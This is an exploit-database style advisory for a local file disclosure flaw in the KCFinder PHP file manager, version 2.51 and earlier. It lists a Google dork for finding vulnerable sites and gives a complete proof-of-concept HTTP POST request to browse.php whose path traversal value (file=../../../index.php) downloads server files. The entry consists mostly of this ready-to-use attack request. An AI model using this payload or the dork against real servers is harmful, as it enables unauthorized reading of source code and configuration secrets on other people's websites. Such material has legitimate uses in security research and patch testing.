--------------------------------------------------- # Exploit Title: KCFinder Local File Disclosure # Author: DaOne # Vendor Homepage: http://kcfinder.sunhater.com/ # Category: webapps/php # Version: 2.51 + old versions # Google dork: inurl:kcfinder/browse.php --------------------------------------------------- [#] Tested on their own demo... -PoC- POST http://server/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1 Host: server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 51 dir=images/Photos+from+Bulgaria&file=../../../index.php